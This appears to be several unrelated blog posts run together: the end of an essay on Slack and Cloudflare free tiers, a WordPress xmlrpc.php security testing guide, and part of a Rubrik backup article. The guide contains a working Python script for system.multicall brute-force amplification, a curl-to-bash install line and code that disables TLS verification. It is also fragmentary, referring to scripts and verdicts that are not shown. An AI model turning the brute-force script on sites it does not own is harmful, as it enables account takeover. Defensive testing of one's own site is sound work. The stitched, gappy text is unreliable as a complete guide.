I used Slack’s free tier heavily for years. Across multiple communities, interest groups, and peer networks, Slack was the default platform precisely because the free tier was generous enough to make it viable for groups that could not or would not pay. It was through this extensive free tier use that I developed deep familiarity with the product, its integrations, its workflow automation capabilities, and its organisational model. That familiarity translated directly into Slack advocacy in enterprise contexts.
Then came a series of changes to the free tier. Message history limits became more restrictive. Integration constraints tightened. The experience of being a free tier user shifted from feeling like a valued participant in the platform ecosystem to feeling like someone being actively nudged toward payment.
The result was not that the communities I participated in upgraded to paid Slack. The result was that those communities moved to other platforms. Discord absorbed many of them. Some moved to Microsoft Teams. Others fragmented across different tools. In most cases the community did not reconstitute on Slack at a paid tier. It simply left.
The downstream consequence for Salesforce, which acquired Slack for approximately 27.7 billion dollars, is a meaningful erosion of exactly the pipeline that free tier usage was building. Every community organiser, technology professional, and business leader who built their Slack intuitions through free tier usage and then migrated to an alternative platform is now building comparable depth of knowledge on a competing product. The future enterprise purchasing decisions of those individuals will reflect that. Slack did not just lose free tier users. It cut off future sales pipeline development at the roots.
This is a cautionary tale that should sit prominently in the strategic planning conversations of any technology company considering changes to their free tier offering. The immediate revenue signal from restricting free tier is misleading. The long-term signal, which is harder to measure and slower to manifest, is the erosion of informed advocacy and the diversion of future decision makers toward alternatives.
5. Rethinking the Marketing Mix
I hold a view that is probably uncomfortable for most marketing organisations: technology companies should meaningfully reduce marketing spend in favour of free tier investment.
I understand why this is a hard argument to make internally. Marketing spend produces attributable metrics. Pipeline influenced, leads generated, impressions delivered. Free tier investment produces outcomes that are diffuse, long horizon, and resistant to attribution. The CIO who advocates for your platform in a 2028 procurement decision because they built something meaningful with your free tier in 2024 is almost impossible to trace back to that original free tier investment in any marketing analytics framework.
But the influence is real and it is durable in a way that no campaign achieves. You can say anything you want about a product through marketing. You can claim reliability, performance, security posture, developer experience, and operational simplicity until every available channel is saturated. None of it carries the weight of having used the product yourself, watched it perform under real conditions, seen it recover from real failures, and built genuine intuition about its architectural strengths and constraints.
There is also a fundamental misunderstanding embedded in how many enterprise technology vendors think about who actually buys their products. Most enterprise software is not bought by lawyers or sourcing teams. It is bought by engineers. Sourcing teams negotiate contracts and lawyers review them, but the decision about which platform gets shortlisted, which architecture gets proposed to leadership, and which vendor gets championed internally is made by the technical people who will live with the choice. Those people make their recommendations based on product knowledge, hands-on experience, and the intuition that comes from having actually built something with the technology. Embedding that knowledge in the market is not a nice to have. It is the primary sales motion, whether vendors recognise it or not. Every engineer who has meaningful free tier experience with your product is a potential internal champion in a future procurement cycle. Every engineer who has never touched your product, because the access gate was too high, is not.
Cloudflare has clearly internalised this. Their free tier is not a reluctant concession to market norms. It is a deliberate investment in developing the next generation of platform advocates. The breadth of capability they make available at no cost, spanning network security, edge compute, DNS, analytics, and Zero Trust access, reflects a confidence that the product will demonstrate its own value to the people who use it. That confidence is justified. It worked on me, though not in the way a typical marketing funnel would predict or model.
6. Conclusion
Free tier products close the distance between description and experience. They are the most honest form of marketing because they are not marketing at all. They are just the product, made accessible.
For Cloudflare, the free tier fundamentally changed how I understand the platform. I came in seeing a CDN with an API gateway. Personal experimentation with Workers, R2, and custom edge security logic revealed an architecture that is genuinely differentiated. The enterprise concerns around peering and the 2025 stability issues remained real, but the product depth I had built through free tier use meant those concerns could be weighed against a much clearer picture of what Cloudflare actually is at a platform level. That is a completely different evaluation from the one I would have made without it.
For Slack, the contraction of free tier generosity has had the opposite effect, redirecting communities and the professional development of their members toward competing platforms in ways that will compound as career trajectories advance.
The lesson is straightforward even if the organisational will to act on it is not. Invest in free tiers. Invest generously. The future pipeline you are building is less visible than the one your sales team can point to today, but it is deeper, more durable, and ultimately more valuable. Let people experience your product. Trust that it is good enough to speak for itself. If it is not, that is the more important problem to solve.
Andrew Baker is the Chief Information Officer at Capitec Bank in South Africa. He writes about enterprise architecture, cloud infrastructure, banking technology, and leadership at andrewbaker.ninja.
A Comprehensive Security Testing Guide for Mac Users
1. Introduction
WordPress xmlrpc.php is a legacy XML-RPC interface that enables remote connections to your WordPress site. While designed for legitimate integrations, this endpoint has become a major security concern due to its susceptibility to brute force attacks and amplification attacks. Understanding how to test your WordPress installation for these vulnerabilities is critical for maintaining site security.
In this guide, I’ll walk you through the technical details of XMLRPC.PHP vulnerabilities and provide practical Python scripts optimized for macOS that you can use to test your own WordPress site for exposure. This is essential knowledge for any WordPress site owner or administrator.
2. What is XMLRPC.PHP?
The xmlrpc.php file is part of WordPress core and implements the XML-RPC protocol, which allows external applications to communicate with your WordPress site. Common legitimate uses include:
Mobile app connections (WordPress mobile app)
Pingbacks and trackbacks from other sites
Remote publishing from desktop clients
Third party integrations and automation
However, attackers exploit this interface because it allows authentication attempts without the same rate limiting and monitoring that the standard WordPress login page receives.
3. The Vulnerability: System.Multicall Amplification
The most dangerous aspect of XMLRPC.PHP is the system.multicall method. This method allows an attacker to send multiple authentication attempts in a single HTTP request. While your WordPress login page might allow one authentication attempt per request, system.multicall can process hundreds or even thousands of login attempts in a single POST request.
Here’s why this is devastating:
Bypasses traditional rate limiting: Most firewalls and security plugins limit requests per IP, but a single request can contain 1000+ authentication attempts
Reduces network overhead: Attackers can test thousands of passwords with minimal bandwidth
Evades monitoring: Security logs may only show a handful of requests while thousands of passwords are being tested
DDoS amplification: Legitimate pingback functionality can be abused to create DDoS attacks against third party sites
4. Prerequisites for macOS
Before we begin testing, ensure your Mac has the necessary tools installed. macOS comes with Python 3 pre-installed (macOS 12.3 and later), but you’ll need to install the requests library.
4.1. Verify Python Installation
Open Terminal (Applications > Utilities > Terminal) and run:
# Install Homebrew if you don't have it
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python
brew install python
4.2. Install Required Python Libraries
Modern macOS versions use externally managed Python environments, so you have three options:
Option 1: Use Python Virtual Environment (Recommended)
For the rest of this guide, we’ll assume you’re using Option 1 (virtual environment). This is the cleanest approach and won’t interfere with your system Python.
5. Testing Your WordPress Site
Before we dive into the code, it’s important to note that you should only test your own WordPress installations. Testing systems you don’t own or have explicit permission to test is illegal and unethical.
5.1. Quick Test Script
Let’s create a quick test script that checks all vulnerabilities at once. This script will return a clear verdict on whether your site is vulnerable.
cat > ~/xmlrpc_poc.py << 'EOF'
#!/usr/bin/env python3
"""
WordPress XMLRPC Brute Force PoC for macOS
WARNING: Only use on your own site with test credentials!
"""
import requests
import sys
import time
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
CYAN = '\033[96m'
BOLD = '\033[1m'
END = '\033[0m'
def test_multicall_amplification(url: str, username: str, password_count: int = 5) -> bool:
"""
Demonstrate brute force amplification using system.multicall
Returns: True if vulnerable to amplification, False otherwise
"""
xmlrpc_url = f"{url}/xmlrpc.php"
# Generate test passwords (intentionally wrong)
test_passwords = [f"testpass{i}" for i in range(1, password_count + 1)]
# Build multicall payload with multiple login attempts
calls = []
for password in test_passwords:
call = f"""
<struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>{username}</string></value>
<value><string>{password}</string></value>
</data>
</array>
</value>
</member>
</struct>
"""
calls.append(call)
payload = f"""<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
{''.join(calls)}
</data>
</array>
</value>
</param>
</params>
</methodCall>
"""
headers = {"Content-Type": "text/xml"}
try:
print(f"\n{Colors.YELLOW}[*] Testing {password_count} passwords in a SINGLE request...{Colors.END}")
start_time = time.time()
response = requests.post(xmlrpc_url, data=payload, headers=headers, timeout=30)
elapsed_time = time.time() - start_time
print(f"{Colors.CYAN}[*] Request completed in {elapsed_time:.2f} seconds{Colors.END}")
print(f"{Colors.CYAN}[*] Server processed {password_count} authentication attempts{Colors.END}")
print(f"{Colors.CYAN}[*] All attempts were in ONE HTTP request{Colors.END}\n")
# Check if the method worked (even if credentials failed)
if "faultCode" in response.text or "Incorrect" in response.text:
print(f"{Colors.RED}[!] VULNERABLE: system.multicall processed all attempts{Colors.END}")
print(f"{Colors.RED}[!] Attackers can test hundreds/thousands of passwords per request{Colors.END}")
return True
else:
print(f"{Colors.GREEN}[+] system.multicall appears to be blocked{Colors.END}")
return False
except Exception as e:
print(f"{Colors.RED}[-] Error during amplification test: {e}{Colors.END}")
return False
def main():
if len(sys.argv) < 2:
print(f"\n{Colors.BOLD}Usage:{Colors.END} python3 xmlrpc_poc.py <wordpress-url> [test_username] [password_count]")
print(f"{Colors.BOLD}Example:{Colors.END} python3 xmlrpc_poc.py https://example.com testuser 10\n")
print(f"{Colors.YELLOW}WARNING: Only test sites you own!{Colors.END}\n")
sys.exit(1)
url = sys.argv[1].rstrip('/')
username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
password_count = int(sys.argv[3]) if len(sys.argv) > 3 else 5
print(f"\n{Colors.CYAN}{Colors.BOLD}{'=' * 70}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}WordPress XMLRPC Brute Force Amplification Test{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}{'=' * 70}{Colors.END}")
print(f"{Colors.BOLD}Target:{Colors.END} {url}")
print(f"{Colors.BOLD}Test Username:{Colors.END} {username}")
print(f"{Colors.BOLD}Password Attempts:{Colors.END} {password_count}")
print(f"{Colors.RED}{Colors.BOLD}WARNING: Only test your own WordPress site!{Colors.END}")
vulnerable = test_multicall_amplification(url, username, password_count)
print(f"\n{Colors.CYAN}{'=' * 70}{Colors.END}")
print(f"{Colors.BOLD}PROOF OF CONCEPT RESULT{Colors.END}")
print(f"{Colors.CYAN}{'=' * 70}{Colors.END}\n")
if vulnerable:
print(f"{Colors.RED}{Colors.BOLD}VERDICT: VULNERABLE TO BRUTE FORCE AMPLIFICATION{Colors.END}\n")
print(f"{Colors.BOLD}What this means:{Colors.END}")
print(f" • Attackers can test {password_count} passwords in 1 HTTP request")
print(f" • Scaling to 1000 passwords per request is trivial")
print(f" • Traditional rate limiting is bypassed")
print(f" • Your logs will show minimal suspicious activity\n")
print(f"{Colors.RED}{Colors.BOLD}TAKE ACTION IMMEDIATELY{Colors.END}\n")
else:
print(f"{Colors.GREEN}{Colors.BOLD}VERDICT: PROTECTED{Colors.END}\n")
print("Your site appears to have protections in place.\n")
print(f"{Colors.CYAN}{'=' * 70}{Colors.END}\n")
if __name__ == "__main__":
main()
EOF
chmod +x ~/xmlrpc_poc.py
Test with proof of concept (only on your own site!):
If your tests reveal that your site is vulnerable, here are the steps you should take. These instructions assume you’re managing your WordPress site from your Mac.
# Open crontab editor
crontab -e
# Add this line:
# 0 * * * * /Users/yourusername/xmlrpc_monitor_cron.sh
8. Real World Attack Scenarios
Understanding how these attacks work in practice helps illustrate the severity:
8.1. Credential Stuffing Attack
Attackers use system.multicall to test stolen credentials from data breaches. A single request can test 1000 username/password combinations, making the attack incredibly efficient and hard to detect.
8.2. DDoS Amplification
Attackers abuse the pingback.ping method to make your WordPress site send requests to a victim’s server. Since your site has more bandwidth than the attacker, this amplifies the DDoS attack.
8.3. Resource Exhaustion
Even without successful authentication, processing thousands of multicall requests can overload your database and PHP processes, causing legitimate site slowdowns or crashes.
9. Additional Security Best Practices for Mac WordPress Admins
# Add this to your scripts after the imports
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Then modify requests to:
response = requests.post(xmlrpc_url, verify=False, timeout=10)
# Make sure scripts are executable
chmod +x ~/xmlrpc_test.py
# Or run with python3 directly
python3 ~/xmlrpc_test.py https://example.com
11. Conclusion
The WordPress XMLRPC.PHP interface represents a significant security risk that many site owners are unaware of. The system.multicall method’s ability to amplify brute force attacks by several orders of magnitude makes it a favorite tool for attackers.
By using the testing scripts provided in this guide optimized for macOS, you can quickly determine if your WordPress sites are vulnerable. The color coded output and clear vulnerability verdicts make it easy to understand your security posture at a glance.
Key Takeaways
Test regularly: Run the main test script monthly on all your WordPress sites
Act on findings: If the script returns “CRITICALLY VULNERABLE”, take immediate action
Disable when possible: XMLRPC should be disabled unless you have a specific need for it
Monitor continuously: Set up automated monitoring to catch attacks early
Layer your security: Use multiple protection methods (firewall + plugin + monitoring)
# Quick test of a single site
~/xmlrpc_test.py https://your-site.com
# Proof of concept demonstration
~/xmlrpc_poc.py https://your-site.com testuser 10
# Batch test multiple sites
~/xmlrpc_batch_test.py ~/wordpress_sites.txt
# Monitor server logs for attacks
~/check_xmlrpc_attacks.sh ~/access.log 10
Remember: Security is an ongoing process, not a one time fix. Stay vigilant and keep your WordPress installations protected.
All scripts in this guide are for educational and security testing purposes only. Always obtain proper authorization before testing any system, and only test WordPress sites that you own or have explicit permission to assess.
1. Backups Should Be Boring (and That Is the Point)
Backups are boring. They should be boring. A backup system that generates excitement is usually signalling failure.
The only time backups become interesting is when they are missing, and that interest level is lethal. Emergency bridges. Frozen change windows. Executive escalation. Media briefings. Regulatory apology letters. Engineers being asked questions that have no safe answers.
Most backup platforms are built for the boring days. Rubrik is designed for the day boredom ends.
2. Backup Is Not the Product. Restore Is.
Many organisations still evaluate backup platforms on the wrong metric: how fast they can copy data somewhere else.
That metric is irrelevant during an incident.
When things go wrong, the only questions that matter are:
What can I restore?
How fast can it be used?
How many restores can run in parallel?
How little additional infrastructure is required?
Rubrik treats restore as the primary product, not a secondary feature.
3. Architectural Starting Point: Designed for Failure, Not Demos
Rubrik was built without tape era assumptions. There is no central backup server, no serial job controller, and no media server bottleneck. Instead, it uses a distributed, scale out architecture with a global metadata index and a stateless policy engine.
Restore becomes a metadata lookup problem, not a job replay problem. This distinction is invisible in demos and decisive during outages.
4. Performance Metrics That Actually Matter
Backup throughput is easy to optimise and easy to market. Restore performance is constrained by network fan out, restore concurrency, control plane orchestration, and application host contention.
Rubrik addresses this by default through parallel restore streams, linear scaling with node count, and minimal control plane chatter. Restore performance becomes predictable rather than optimistic.
5. Restore Semantics That Match Reality
The real test of any backup platform is not how elegantly it captures data, but how usefully it returns that data when needed. This is where architectural decisions made years earlier either pay dividends or extract penalties.
5.1 Instant Access Instead of Full Rehydration
Rubrik does not require full data copy back before access. It supports live mount of virtual machines, database mounts directly from backup storage, and file system mounts for selective recovery.
The recovery model becomes access first, copy later if needed. This is the difference between minutes and hours when production is down.
5.2 Dropping a Table Should Not Be a Crisis
Rubrik understands databases as structured systems, not opaque blobs.
It supports table level restores for SQL Server, mounting a database backup as a live database, extracting tables or schemas without restoring the full database, and point in time recovery without rollback.
Accidental table drops should be operational annoyances, not existential threats.
5.3 Supported Database Engines
Rubrik provides native protection for the major enterprise database platforms:
Database Engine
Live Mount
Point in Time Recovery
Key Constraints
Microsoft SQL Server
Yes
Yes (transaction log replay)
SQL 2012+ supported; Always On AG, FCI, standalone
Oracle Database
Yes
Yes (archive log replay)
RAC, Data Guard, Exadata supported; SPFILE required for automated recovery
SAP HANA
No
Yes
Backint API integration; uses native HANA backup scheduling
PostgreSQL
No
Yes (up to 5 minute RPO)
File level incremental; on premises and cloud (AWS, Azure, GCP)
IBM Db2
Via Elastic App Service
Yes
Uses native Db2 backup utilities
MongoDB
Via Elastic App Service
Yes
Sharded and unsharded clusters; no quiescing required
MySQL
Via Elastic App Service
Yes
Uses native MySQL backup tools
Cassandra
Via Elastic App Service
Yes
Via Rubrik Datos IO integration
The distinction between native integration and Elastic App Service matters operationally. Native integration means Rubrik handles discovery, scheduling, and orchestration directly. Elastic App Service means Rubrik provides managed volumes as backup targets while the database’s native tools handle the actual backup process. Both approaches deliver immutability and policy driven retention, but the operational experience differs.
5.4 Live Mount: Constraints and Caveats
Live Mount is Rubrik’s signature capability—mounting backups as live, queryable databases without copying data back to production storage. The database runs with its data files served directly from the Rubrik cluster over NFS (for Oracle) or SMB 3.0 (for SQL Server).
This capability is transformative for specific use cases. It is not a replacement for production storage.
What Live Mount Delivers:
Near instant database availability (seconds to minutes, regardless of database size)
Zero storage provisioning on the target host
Multiple concurrent mounts from the same backup
Point in time access across the entire retention window
Ideal for granular recovery, DBCC health checks, test/dev cloning, audit queries, and upgrade validation
What Live Mount Does Not Deliver:
Production grade I/O performance
High availability during Rubrik cluster maintenance
Persistence across host or cluster reboots
IOPS Constraints:
Live Mount performance is bounded by the Rubrik appliance’s ability to serve I/O, not by the target host’s storage subsystem. Published figures suggest approximately 30,000 IOPS per Rubrik appliance for Live Mount workloads. This is adequate for reporting queries, data extraction, and validation testing. It is not adequate for transaction heavy production workloads.
The performance characteristics are inherently different from production storage:
Metric
Production SAN/Flash
Rubrik Live Mount
Random read IOPS
100,000+
~30,000 per appliance
Latency profile
Sub millisecond
Network + NFS overhead
Write optimisation
Production tuned
Backup optimised
Concurrent workloads
Designed for contention
Shared with backup operations
SQL Server Live Mount Specifics:
Databases mount via SMB 3.0 shares with UNC paths
Transaction log replay occurs during mount for point in time positioning
The mounted database is read write, but writes go to the Rubrik cluster
Supported for standalone instances, Failover Cluster Instances, and Always On Availability Groups
Table level recovery requires mounting the database, then using T SQL to extract and import specific objects
Oracle Live Mount Specifics:
Data files mount via NFS; redo logs and control files remain on the target host
Automated recovery requires source and target configurations to match (RAC to RAC, single instance to single instance, ASM to ASM)
Files only recovery allows dissimilar configurations but requires DBA managed RMAN recovery
SPFILE is required for automated recovery; PFILE databases require manual intervention
Block change tracking (BCT) is disabled on Live Mount targets
Live Mount fails if the target host, RAC cluster, or Rubrik cluster reboots during the mount—requiring forced unmount to clean up metadata
Direct NFS (DNFS) is recommended on Oracle RAC nodes for improved recovery performance
What Live Mount Is Not:
Live Mount is explicitly designed for temporary access, not sustained production workloads. The use cases Rubrik markets—test/dev, DBCC validation, granular recovery, audit queries—all share a common characteristic: they are time bounded operations that tolerate moderate I/O performance in exchange for instant availability.
Running production transaction processing against a Live Mount database would be technically possible and operationally inadvisable. The I/O profile, the network dependency, and the lack of high availability guarantees make it unsuitable for workloads where performance and uptime matter.
5.5 The Recovery Hierarchy
Understanding when to use each recovery method matters:
Recovery Need
Recommended Method
Time to Access
Storage Required
Extract specific rows/tables
Live Mount + query
Minutes
None
Validate backup integrity
Live Mount + DBCC
Minutes
None
Clone for test/dev
Live Mount
Minutes
None
Full database replacement
Export/Restore
Hours (size dependent)
Full database size
Disaster recovery cutover
Instant Recovery
Minutes (then migrate)
Temporary, then full
The strategic value of Live Mount is avoiding full restores when full restores are unnecessary. For a 5TB database where someone dropped a single table, Live Mount means extracting that table in minutes rather than waiting hours for a complete restore.
For actual disaster recovery, where the production database is gone and must be replaced, Live Mount provides bridge access while the full restore completes in parallel. The database is queryable immediately; production grade performance follows once data migration finishes.
5.6 The Hidden Failure Mode After a Successful Restore
Rubrik is not deployed in a single explosive moment. In the real world, it is rolled out carefully over weeks. Systems are onboarded one by one, validated, and then left to settle. Each system performs a single full backup, after which life becomes calm and predictable. From that point forward, everything is incremental. Deltas are small, backup windows shrink, networks breathe easily, and the platform looks deceptively relaxed.
This operating state creates a dangerous illusion.
After a large scale recovery event, you will spend hours restoring systems. That work feels like the crisis. It is not. The real stress event happens later, quietly, on the first night after the restores complete. Every restored system now believes it is brand new. Every one of them schedules a full backup. At that moment, your entire estate attempts to perform a first full backup simultaneously while still serving live traffic.
This is the point where Rubrik appliances, networks, and upstream storage experience their true failure conditions. Not during the restore, but after it. Massive ingest rates, saturated links, constrained disk, and queueing effects all arrive at once. If this scenario is not explicitly planned for, the recovery that looked successful during the day can cascade into instability overnight.
Recovery planning therefore cannot stop at restore completion. Backup re entry must be treated as a first class recovery phase. In most environments, the only viable strategy is to deliberately phase backup schedules over multiple days following a large scale restore. Systems must be staggered back into protection in controlled waves, rather than allowed to collide into a single catastrophic full backup storm.
Restore is the product. But what comes after restore is where architectures either hold, or quietly collapse.
6. Why Logical Streaming Is a Design Failure
Traditional restore models stream backup data through the database host. This guarantees CPU contention, IO pressure, and restore times proportional to database size rather than change size.
Figure 1 illustrates this contrast clearly. Traditional restore requires data to be copied back through the database server, creating high I/O, CPU and network load with correspondingly long restore times. Rubrik’s Live Mount approach mounts the backup copy directly, achieving near zero RTO with minimal data movement. The difference between these approaches becomes decisive when production is down and every minute of restore time translates to business impact.
Rubrik avoids this by mounting database images and extracting only required objects. The database host stops being collateral damage during recovery.
6.1 The VSS Tax: Why SQL Server Backups Cannot Escape Application Coordination
For VMware workloads without databases, Rubrik can leverage storage level snapshots that are instantaneous, application agnostic, and impose zero load on the guest operating system. The hypervisor freezes the VM state, the storage array captures the point in time image, and the backup completes before the application notices.
SQL Server cannot offer this simplicity. The reason is not a Microsoft limitation or a Rubrik constraint. The reason is transactional consistency.
6.1.1 The Crash Consistent Option Exists
Nothing technically prevents Rubrik, or any backup tool, from taking a pure storage snapshot of a SQL Server volume without application coordination. The snapshot would complete in milliseconds with zero database load.
The problem is what you would recover: a crash consistent image, not an application consistent one.
A crash consistent snapshot captures storage state mid flight. This includes partially written pages, uncommitted transactions, dirty buffers not yet flushed to disk, and potentially torn writes caught mid I/O. SQL Server is designed to recover from exactly this state. Every time the database engine starts after an unexpected shutdown, it runs crash recovery, rolling forward committed transactions from the log and rolling back uncommitted ones.
The database will become consistent. Eventually. Probably.
6.1.2 Why Probably Is Not Good Enough
Crash recovery works. It works reliably. It is tested millions of times daily across every SQL Server instance that experiences an unclean shutdown.
But restore confidence matters. When production is down and executives are asking questions, the difference between “this backup is guaranteed consistent” and “this backup should recover correctly after crash recovery completes” is operationally significant.
VSS exists to eliminate that uncertainty.
6.1.3 What VSS Actually Does
When a backup application requests an application consistent SQL Server snapshot, the sequence shown in Figure 2 executes. The backup server sends a signal through VSS Orchestration, which triggers the SQL Server VSS Writer to prepare the database. This preparation involves flushing dirty pages to storage, hardening transaction logs, and momentarily freezing I/O. Only then does the storage-level snapshot execute, capturing a point-in-time consistent image that requires no crash recovery on restore.
The result is a snapshot that requires no crash recovery on restore. The database is immediately consistent, immediately usable, and carries no uncertainty about transactional integrity.
6.1.4 The Coordination Cost
The VSS freeze window is typically brief, milliseconds to low seconds. But the preparation is not free.
Buffer pool flushes on large databases generate I/O pressure. Checkpoint operations compete with production workloads. The freeze, however short, introduces latency for in flight transactions. The database instance is actively participating in its own backup.
For databases measured in terabytes, with buffer pools consuming hundreds of gigabytes, this coordination overhead becomes operationally visible. Backup windows that appear instantaneous from the storage console are hiding real work inside the SQL Server instance.
6.1.5 The Architectural Asymmetry
This creates a fundamental difference in backup elegance across workload types:
Workload Type
Backup Method
Application Load
Restore State
VMware VM (no database)
Storage snapshot
Zero
Crash consistent (acceptable)
VMware VM (with SQL Server)
VSS coordinated snapshot
Moderate
Application consistent
Physical SQL Server
VSS coordinated snapshot
Moderate to high
Application consistent
Physical SQL Server
Pure storage snapshot
Zero
Crash consistent (risky)
For a web server or file share, crash consistent is fine. The application has no transactional state worth protecting. For a database, crash consistent means trusting recovery logic rather than guaranteeing consistency.
6.1.6 The Uncomfortable Reality
The largest, most critical SQL Server databases, the ones that would benefit most from zero overhead instantaneous backup, are precisely the workloads where crash consistent snapshots carry the most risk. More transactions in flight. Larger buffer pools. More recovery time if something needs replay.
Rubrik supports VSS coordination because the alternative is shipping backups that might need crash recovery. That uncertainty is acceptable for test environments. It is rarely acceptable for production databases backing financial systems, customer records, or regulatory reporting.
The VSS tax is not a limitation imposed by Microsoft or avoided by competitors. It is the cost of consistency. Every backup platform that claims application consistent SQL Server protection is paying it. The only question is whether they admit the overhead exists.
7. Snapshot Based Protection Is Objectively Better (When You Can Get It)
The previous section explained why SQL Server backups cannot escape application coordination. VSS exists because transactional consistency requires it, and the coordination overhead is the price of certainty.
This makes the contrast with pure snapshot based protection even starker. Where snapshots work cleanly, they are not incrementally better. They are categorically superior.
7.1 What Pure Snapshots Deliver
Snapshot based backups in environments that support them provide:
Near instant capture: microseconds to milliseconds, regardless of dataset size
Zero application load: the workload never knows a backup occurred
Consistent recovery points: the storage layer guarantees point in time consistency
Predictable backup windows: duration is independent of data volume
No bandwidth consumption during capture: data movement happens later, asynchronously
A 50TB VMware datastore snapshots in the same time as a 50GB datastore. Backup windows become scheduling decisions rather than capacity constraints.
Rubrik exploits this deeply in VMware environments. Snapshot orchestration, instant VM recovery, and live mounts all depend on the hypervisor providing clean, consistent, zero overhead capture points.
7.2 Why This Is Harder Than It Looks
The elegance of snapshot based protection depends entirely on the underlying platform providing the right primitives. This is where the gap between VMware and everything else becomes painful.
VMware offers:
Native snapshot APIs with transactional semantics
Changed Block Tracking (CBT) for efficient incrementals
Hypervisor level consistency without guest coordination
Storage integration through VADP (vSphere APIs for Data Protection)
These are not accidental features. VMware invested years building a backup ecosystem because they understood that enterprise adoption required operational maturity, not just compute virtualisation.
Physical hosts offer none of this.
There is no universal snapshot API for bare metal servers. Storage arrays provide snapshot capabilities, but each vendor implements them differently, with different consistency guarantees, different integration points, and different failure modes. The operating system has no standard mechanism to coordinate application state with storage level capture.
7.3 The Physical Host Penalty
This is why physical SQL Server hosts face a compounding disadvantage:
No hypervisor abstraction: there is no layer between the OS and storage that can freeze state cleanly
VSS remains mandatory: application consistency still requires database coordination
No standardised incremental tracking: without CBT or equivalent, every backup must rediscover what changed
Storage integration is bespoke: each array, each SAN, each configuration requires specific handling
The result is that physical hosts with the largest databases—the workloads generating the most backup data, with the longest restore times, under the most operational pressure, receive the least architectural benefit from modern backup platforms.
They are stuck paying the VSS tax without receiving the snapshot dividend.
7.4 The Integration Hierarchy
Backup elegance follows a clear hierarchy based on platform integration depth:
Environment
Snapshot Quality
Incremental Efficiency
Application Consistency
Overall Experience
VMware (no database)
Excellent
CBT driven
Not required
Seamless
VMware (with SQL Server)
Excellent
CBT driven
VSS coordinated
Good with overhead
Cloud native (EBS, managed disks)
Good
Provider dependent
Varies by workload
Generally clean
Physical with enterprise SAN
Possible
Array dependent
VSS coordinated
Complex but workable
Physical with commodity storage
Limited
Often full scan
VSS coordinated
Painful
The further down this hierarchy, the more the backup platform must compensate for missing primitives. Rubrik handles this better than most, but even excellent software cannot conjure APIs that do not exist.
7.5 Why the Industry Irony Persists
The uncomfortable truth is that snapshot based protection delivers its greatest value precisely where it is least available.
A 500GB VMware VM snapshots effortlessly. The hypervisor provides everything needed. Backup is boring, as it should be.
A 50TB physical SQL Server, the database actually keeping the business running, containing years of transactional history, backing regulatory reporting and financial reconciliation, must coordinate through VSS, flush terabytes of buffer pool, sustain I/O pressure during capture, and hope the storage layer cooperates.
The workloads that need snapshot elegance the most are architecturally prevented from receiving it.
This is not a Rubrik limitation. It is not a Microsoft conspiracy. It is the accumulated consequence of decades of infrastructure evolution where virtualisation received backup investment and physical infrastructure did not.
7.6 What This Means for Architecture Decisions
Understanding this hierarchy should influence infrastructure strategy:
Virtualise where possible. The backup benefits alone often justify the overhead. A SQL Server VM with VSS coordination still benefits from CBT, instant recovery, and hypervisor level orchestration.
Choose storage with snapshot maturity. If physical hosts are unavoidable, enterprise arrays with proven snapshot integration reduce the backup penalty. This is not the place for commodity storage experimentation.
Accept the VSS overhead. For SQL Server workloads, crash consistent snapshots are technically possible but operationally risky. The coordination cost is worth paying. Budget for it in backup windows and I/O capacity.
Plan restore, not backup. Snapshot speed is irrelevant if restore requires hours of data rehydration. The architectural advantage of snapshots extends to recovery only if the platform supports instant mount and selective restore.
Rubrik’s value in this landscape is not eliminating the integration gaps, nobody can, but navigating them intelligently. Where snapshots work, Rubrik exploits them fully. Where they do not, Rubrik minimises the penalty through parallel restore, live mounts, and metadata driven recovery.
The goal remains the same: make restore the product, regardless of how constrained the backup capture had to be.
8. Rubrik Restore Policies: Strategy, Trade offs, and Gotchas
SLA Domains are Rubrik’s policy abstraction layer, and understanding how to configure them properly separates smooth recoveries from painful ones. The flexibility is substantial, but so are the consequences of misconfiguration.
8.1 Understanding SLA Domain Architecture
Rubrik’s policy model centres on SLA Domains, named policies that define retention, frequency, replication, and archival behaviour. Objects are assigned to SLA Domains rather than configured individually, which creates operational leverage but requires upfront design discipline.
The core parameters that matter for restore planning:
Snapshot Frequency determines your Recovery Point Objective (RPO). A 4-hour frequency means you could lose up to 4 hours of data. For SQL Server with log backup enabled, transaction logs between snapshots reduce effective RPO to minutes, but the full snapshot frequency still determines how quickly you can access a baseline restore point.
Local Retention controls how many snapshots remain on the Rubrik cluster for instant access. This is your Live Mount window. Data within local retention restores in minutes. Data beyond it requires rehydration from archive, which takes hours.
Replication copies snapshots to a secondary Rubrik cluster, typically in another location. This is your disaster recovery tier. Replication targets can serve Live Mount operations, meaning DR isn’t just “eventually consistent backup copies” but actual instant recovery capability at the secondary site.
Archival moves aged snapshots to object storage (S3, Azure Blob, Google Cloud Storage). Archive tier data cannot be Live Mounted, it must be retrieved first, which introduces retrieval latency and potentially egress costs.
8.2 The Retention vs. Recovery Speed Trade off
This is where most organisations get the policy design wrong.
The temptation is to keep minimal local retention and archive aggressively to reduce storage costs. The consequence is that any restore request older than a few days becomes a multi hour operation.
Consider the mathematics for a 5TB SQL Server database:
Recovery Scenario
Local Retention
Time to Access
Operational Impact
Yesterday’s backup
Within local retention
2-5 minutes (Live Mount)
Minimal
Last week’s backup
Within local retention
2-5 minutes (Live Mount)
Minimal
Last month’s backup
Archived
4-8 hours (retrieval + restore)
Significant
Last quarter’s backup
Archived (cold tier)
12-24 hours
Major incident
The storage cost of keeping 30 days local versus 7 days local might seem significant when multiplied across the estate. But the operational cost of a 6 hour restore delay during an audit request or compliance investigation often exceeds years of incremental storage spend.
Recommendation: Size local retention to cover your realistic recovery scenarios, not your theoretical minimum. For most organisations, 14-30 days of local retention provides the right balance between cost and operational flexibility.
8.3 SLA Domain Design Patterns
8.3.1 Pattern 1: Tiered by Criticality
Create separate SLA Domains for different criticality levels:
Platinum: 4 hour snapshots, 30 day local retention, synchronous replication, 7 year archive
